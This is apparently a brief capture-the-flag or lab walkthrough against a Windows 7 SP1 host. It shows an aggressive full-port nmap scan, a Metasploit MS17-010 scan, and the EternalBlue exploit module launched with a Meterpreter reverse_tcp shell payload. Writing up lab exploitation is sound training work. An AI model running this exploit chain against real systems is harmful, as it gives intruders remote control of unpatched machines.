First Step: Nmap scan for open ports,services,etc
nmap -p- -A -T4 <ip targett>
• -p-: This option tells Nmap to scan all ports on the target host. The hyphen after the "p" indicates that Nmap should scan all ports, rather than a specific range of ports.
• -A: This option enables several advanced features in Nmap, including operating system detection, version detection of services running on open ports, and script scanning. The -A option is a shorthand for enabling a group of options that are commonly used together.
• -T4: This option sets the timing template for the scan to "aggressive", which means that Nmap will send packets more quickly than the default timing template. This can speed up the scan, but may also increase the chance of missed results or false positives.
Now we know that [Windows 7 Ultimate 7601 Service Pack 1] windows version
now trying to find if this vulnerable, I Will search in google like this: Windows 7 Ultimate 7601 Service Pack 1 exploit
Now we have this , so trying to exploit it using metasploit and search about EternalBlue as in image ,
so i find those, let’s run scanner and see!
<aside> 💡 IMPORTANT NOTE! auxiliary modules not attack or something like that, it’s just scanning an tell us what going on and check , but not attacking
</aside>
Let’s Continue, Now we will set rhost to our victim machine and run the exploit and this result !
Now we will using exploit/windows/smb/ms17_010_eternalblue
and set our payload set payload windows/x64/meterpreter/reverse_tcp and RUN!
